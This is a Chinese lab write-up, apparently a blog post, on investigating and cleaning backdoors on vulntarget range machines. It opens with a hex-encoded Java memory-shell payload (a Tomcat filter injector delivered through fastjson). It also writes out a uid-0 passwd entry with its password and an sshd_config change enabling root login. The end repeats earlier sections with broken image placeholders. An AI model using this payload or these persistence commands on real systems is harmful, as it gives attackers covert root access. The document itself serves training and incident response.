672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c64010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021004b005e0001005f0001001200600061000100620000000200020008000100630064000100650000003d000200010000000b2ab700012a1202b50003b10000000200660000000e00030000002900040027000a002a00670000000c00010000000b0068006900000001006a006b00030065000000350000000200000001b10000000200660000000600010000002d00670000001600020000000100680069000000000001006c006d0001006e000000040001006f00700000000501006c000000010071007200030065000003180006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a700701908b60012b60013b60013b60013b60013b60013b600141215b6001199002a1908b60012b60013b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000072001c0000003000060031000c003200150033001e0034002a00350036003600420037004a00380059003a006c003b0076003c0087003d009d003e00aa003f00bb004000d4004100e4004200f5004301110044012400450135004601540047016a0048017b004a0194004b01a2004e01aa0051006700000098000f0076001100730074000900aa001100730074000900e4001100730074000901240011007300740009016a001100730074000901940016007300740009000001ab006800690000000001ab007500760001000001ab007700780002000001ab0079007a0003000601a5007b007c0004000c019f007d007e000500150196007f00800006001e018d008100820007004a016100830084000800850000000c0001001e018d0081008600070087000000330007ff0087000907008807008907008a07008b07008c07008d07008e07008f070090000033393ffb0045fc0026070091fa0007006e0000000600020092006f00700000000d03007500000077000000790000000100930064000100650000002b0000000100000001b10000000200660000000600010000005400670000000c00010000000100680069000000010094009500030065000002e50006001200000133b800181219b6001a3a062b121b06bd001c5903121d535904b2001e535905b2001e53b6001f3a07190704b60020013a082c1221b600223a08a700293a0919072c06bd00245903190653590403b800255359051906beb8002553b60026c0001c3a08190804bd001c5903122753b600283a09190904b60029190904bd002459032ab60012b6002a53b6002b3a0a1908122c04bd001c5903121d53b6001f3a0b190b04b6002012023a0c2d122d190cb9002e0300122fb800303a0d190d05bb003159190cb60032122fb70033b60034190dbb003559b700361904b900370100b60038b60039b6003a3a0e190b190a04bd00245903190e53b60026c0001c3a0f190fb6003b3a10190f123c04bd001c5903122453b6001f3a11191104b600201911191004bd00245903190553b6002657a700053a07b1000200300038003b0023000a012d0130003d000400660000006a001a00000057000a005a0027005b002d005c0030005f00380062003b0060003d0061006100640071006500770066008c0067009e006800a4006900a8006a00b2006b00b9006c00cd006d00e8006e00fd006f0104007001160071011c0072012d007401300073013200750067000000c00013003d002400960097000900270106009800990007003000fd009a00740008007100bc009b009c0009008c00a1009d009e000a009e008f009f0099000b00a8008500a00061000c00b9007400a100a2000d00e8004500a300a4000e00fd003000a50074000f0104002900a6009e00100116001700a70099001100000133006800690000000001330073007400010000013300830084000200000133007f0080000300000133007b007c000400000133008100820005000a012900a800a4000600850000000c0001000001330081008600050087000000480004ff003b000907008807009107009007008e07008c07008f07001d0700a907009100010700aa25ff00ce000707008807009107009007008e07008c07008f07001d00010700ab01007000000015050073000000830000007f0000007b00000081000000ac0000000200ad000100ae00af000300650000003f0000000300000001b1000000020066000000060001000000780067000000200003000000010068006900000000000100b000b100010000000100b200b30002006e00000004000100b40070000000090200b0000000b20000000100ae00b500030065000000490000000400000001b10000000200660000000600010000007b00670000002a0004000000010068006900000000000100b000b100010000000100b600b700020000000100b800b90003006e00000004000100b400700000000d0300b0000000b6000000b80000000800ba006400010065000001da0005000a000000de123e4bb8000db6000ec0003f4c2bb60040b900410100c000424d1243b800441245b600464e2d04b600472d2cb60048c000493a041904123eb9004a0200c7009cbb004b59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123eb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123eb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123e1909b9000a030057a700044bb10001000000d900dc003d000300660000006600190000007f00030080000d0081001a008200250083002a008400340085004000860049008700520088005900890060008a006d008b0073008c007c008d0083008e008a008f00950090009b009100b0009200b6009300cd009400d9009700dc009600dd0099006700000066000a0049009000bb00bc00050052008700bd00be0006007c005d00bf00c0000700b00029009b009c000800cd000c006c00c10009000300d600c200610000000d00cc00c300c40001001a00bf00c500c60002002500b400c700c80003003400a500c90082000400870000000a0003fb00d9420700ab00000200ca0000000200cb01470000000a000100e500e201460009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;",
}
}
前面扫了22端口开着
那就接着写入新用户,
fwl:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash
账号fwl 密码admin23
直接冰蝎上改即可
此时还连不上 要允许非root用户ssh登录
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
重启
/etc/init.d/ssh restart
内网03
排查
排查真的有点难顶
根据前两台机子先查看有无隐藏用户
并没有
看看有无异常端口
netstat -antlp|more
看看环境变量
每个目录以“ : ”符号进行分隔
看看有没有异常的文件或代码
并没有
看看.ssh是否被植入了对方的私钥
因为开了ssh服务黑客入侵后要是再authorized_keys中植入自己的私钥,就可以免密登录
cat ~/.ssh/authorized_keys
存在后门,删除
继续排查
ps -ef |grep java 查看在运行的Java进程
同样的位置找到app.jar
下载下来
这个是可以反编译的,前面走的http.server应该下的不完整,内网02等会重新下载一下应该也可以了
内网02 的也可以了
先分析02的
找到一个后门
目前只能够在内存里面将其清除
利用到一个工具:https://github.com/alibaba/arthas/releases
重新编译上述usercontroller.class
毁掉恶意部分,准备热更新
第二台机器内存马热更新
上传需要的工具到02机子
第二台机器上不出网,所以需要先把这个文件在其他的位置执行下,把下载的文件复制到该机器上来
tar打包 靶机没有unzip
上传到02机子
tar -cvf arthas.tar .arthas 压缩
tar -xvf arthas.tar 解压
再次执行
java -jar arthas-boot.jar
将文件进行热更新
retransform /hmoe/vulntarget/UserController.class
这里又遇到问题,UserController.java 我用javac一直报错无法给他编译成UserController.class
先留着做03的
同理也是下载app.jar
然后反编译
做不来头疼
![image-20240411003518240](https://img-blog.csdnimg.cn/img_convert/ecfabd91e395ab1b409bc31c079b7767.png)
下载到本地
用d盾直接扫
后门1
ShellServlet.java
中发现了exec
后门
后门2
03内存马热修复
class文件路径
retransform /home/vulntarget/.copagent/class/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl$TransletClassLoader-4d432b55/ShellServlet.class
retransform /home/vulntarget/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-49c2faae/javax/servlet/http/HttpServlet.class
前面02没做也用这个方法做了
热修复
retransform /root/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-21b8d17c/com/example/shiro550/controller/UserController.class
总结
对于后面内存马的审计,分析有些不懂,比较模糊。
继续学习
r/image/202404110035289.png" alt=“image-20240411003518240” style=“zoom:150%;” />
[外链图片转存中…(img-Cb0IA5HT-1713019622179)]
下载到本地
[外链图片转存中…(img-l7zi540I-1713019622179)]
用d盾直接扫
[外链图片转存中…(img-Y2GLHdH1-1713019622179)]
[外链图片转存中…(img-yD7uL4xD-1713019622179)]
后门1
ShellServlet.java
中发现了exec
后门
后门2
[外链图片转存中…(img-JiELK1Ev-1713019622179)]
[外链图片转存中…(img-AHKETOvU-1713019622179)]
03内存马热修复
class文件路径
retransform /home/vulntarget/.copagent/class/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl$TransletClassLoader-4d432b55/ShellServlet.class
retransform /home/vulntarget/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-49c2faae/javax/servlet/http/HttpServlet.class
[外链图片转存中…(img-DIbwRzQN-1713019622180)]
[外链图片转存中…(img-HH1borXw-1713019622180)]
前面02没做也用这个方法做了
[外链图片转存中…(img-AMqj9DsG-1713019622180)]
热修复
retransform /root/.copagent/class/org.springframework.boot.loader.LaunchedURLClassLoader-21b8d17c/com/example/shiro550/controller/UserController.class
[外链图片转存中…(img-5d7qDv0G-1713019622180)]
总结
对于后面内存马的审计,分析有些不懂,比较模糊。
继续学习